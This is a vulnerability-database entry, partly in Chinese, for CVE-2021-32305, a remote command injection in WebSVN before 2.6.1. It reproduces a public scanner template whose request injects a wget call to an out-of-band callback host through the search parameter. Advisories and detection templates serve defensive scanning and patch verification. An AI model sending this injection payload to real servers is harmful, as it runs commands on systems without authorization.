CVE-2021-32305: Websvn <2.6.1 - Remote Code Execution

日期: 2025-08-01 | 影响软件: Websvn | POC: 已公开

漏洞描述

WebSVN before 2.6.1 allows remote attackers to execute arbitrary commands via shell metacharacters in the search parameter.

PoC代码[已公开]

id: CVE-2021-32305

info:
  name: Websvn <2.6.1 - Remote Code Execution
  author: gy741
  severity: critical
  description: WebSVN before 2.6.1 allows remote attackers to execute arbitrary commands via shell metacharacters in the search parameter.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the target system.
  remediation: |
    Upgrade Websvn to version 2.6.1 or later to mitigate this vulnerability.
  reference:
    - https://packetstormsecurity.com/files/163225/Websvn-2.6.0-Remote-Code-Execution.html
    - https://github.com/websvnphp/websvn/pull/142
    - http://packetstormsecurity.com/files/163225/Websvn-2.6.0-Remote-Code-Execution.html
    - https://nvd.nist.gov/vuln/detail/CVE-2021-32305
    - https://github.com/HimmelAward/Goby_POC
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2021-32305
    cwe-id: CWE-78
    epss-score: 0.93293
    epss-percentile: 0.99804
    cpe: cpe:2.3:a:websvn:websvn:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: websvn
    product: websvn
  tags: cve,cve2021,websvn,rce,oast,packetstorm

http:
  - raw:
      - |
        GET /search.php?search=%22;wget+http%3A%2F%2F{{interactsh-url}}%27;%22 HTTP/1.1
        Host: {{Hostname}}
        Accept-Encoding: gzip, deflate
        Accept: */*

    matchers:
      - type: word
        part: interactsh_protocol # Confirms the HTTP Interaction
        words:
          - "http"
# digest: 4b0a00483046022100d1c235a91059cefdb07145c8e7f0c733cdd2a3e824340bc502c45941ed8742fd022100c43d14708e66f5b1ca40e574668019f543bcaf7522ef7828fe0656fa229b85ae:922c64590222798bb761d5b6d8e72950

相关漏洞推荐